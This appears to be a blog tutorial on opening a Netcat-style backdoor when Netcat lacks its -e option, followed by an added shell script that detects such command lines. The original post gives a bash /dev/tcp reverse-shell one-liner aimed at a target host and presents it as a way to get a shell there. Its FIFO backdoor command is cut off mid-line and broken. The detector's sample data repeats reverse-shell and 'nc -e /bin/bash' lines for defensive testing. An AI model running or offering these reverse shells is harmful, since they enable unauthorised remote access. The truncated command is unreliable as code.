Netcat backdoor without -e and mimicking Netcat with bash

Netcat backdoor without -e (execute option)

Netcat is installed by default on a lot of Linux systems; however, we are seeing more and more Netcat builds compiled without the -e option. The -e option allows us to execute a program and serve it over the connected socket. It is an incredibly handy feature, both for controlling an executable over a network connection and for creating simple backdoors. Thus, as a security measure, Netcat is sometimes compiled without the -e option. In fact, if you want to compile Netcat with the -e option, you need to build it with GAPING_SECURITY_HOLE defined.

While the -e option can be a concern from a security point of view, compiling it out is often trivially bypassed.

Below is an example that serves a shell without the execute option. It uses a special Linux file type, a named pipe: a FIFO, in which what goes in first comes out first. Quite handy for pushing data through in an orderly fashion.

mknod pipe p
/bin/bash 0

I don’t care what you just showed me, I don’t have Netcat!

Bash can open arbitrary TCP and UDP connections to wherever you want, so a Netcat-like reverse shell would be:

/bin/bash -i >& /dev/tcp/TargetIP/Port 0>&1

On your target system you should be receiving a sweet bash shell.
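From the defender's side, here is a small check that flags the two shapes shown above (the FIFO-plus-Netcat pipe and the bash /dev/tcp redirection) as well as Netcat's -e/-c execute flags in process command-line telemetry. It is added here as an example and is not part of the original post; the sample log lines, the 192.0.2.10 address and the rule names are constructed for it.

```shell
#!/bin/sh
# Classify process-exec command lines by the shell-only backdoor shapes described above.
# The SAMPLE lines at the bottom are constructed for this example, not real telemetry.
# classify_cmd CMDLINE -> prints the rule name that fires (prints nothing if none).
classify_cmd() {
  line=$1
  has_nc=0; has_fifo=0; nc_exec=0
  # Rule 1: bash network redirections (/dev/tcp, /dev/udp) anywhere in the line.
  case "$line" in
    */dev/tcp/*|*/dev/udp/*) echo BASH_NET_REDIRECT; return 0 ;;
  esac
  # Tokenize: turn shell operators into spaces so "nc" is seen after ";" or "|".
  norm=$(printf '%s' "$line" | tr ';|&<>()' '       ')
  set -f; set -- $norm; set +f          # split on whitespace, no globbing
  for w in "$@"; do
    case "${w##*/}" in                  # compare on basename: /usr/bin/nc -> nc
      nc|netcat|ncat)         has_nc=1 ;;
      mkfifo|mknod)           has_fifo=1 ;;
      -e|-c|--exec|--sh-exec) if [ "$has_nc" -eq 1 ]; then nc_exec=1; fi ;;
    esac
  done
  # Rule 2: netcat told to execute a program (the -e build option discussed above).
  if [ "$nc_exec" -eq 1 ]; then
    echo NETCAT_EXEC
  # Rule 3: a FIFO created and netcat started in the same command line.
  elif [ "$has_nc" -eq 1 ] && [ "$has_fifo" -eq 1 ]; then
    echo FIFO_NETCAT_PIPE
  fi
  return 0
}

# scan_cmds: reads one command line per stdin line, prints "RULE<TAB>line" per hit.
scan_cmds() {
  while IFS= read -r l || [ -n "$l" ]; do
    r=$(classify_cmd "$l")
    if [ -n "$r" ]; then printf '%s\t%s\n' "$r" "$l"; fi
  done
  return 0
}

# Constructed sample (192.0.2.10 is a documentation address, not a real host):
SAMPLE='bash -i >& /dev/tcp/192.0.2.10/4444 0>&1
mkfifo /tmp/f && nc -l -p 4444 < /tmp/f
nc -l -p 4444 -e /bin/bash
rsync -e ssh ./src user@host:/dst
mknod /tmp/pipe p
ls -la /dev/'

printf '%s\n' "$SAMPLE" | scan_cmds
```

Note that a FIFO on its own (the mknod line) and an unrelated -e flag (the rsync line) are deliberately not flagged; the rules key on the combination, which keeps false positives down on ordinary admin activity.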

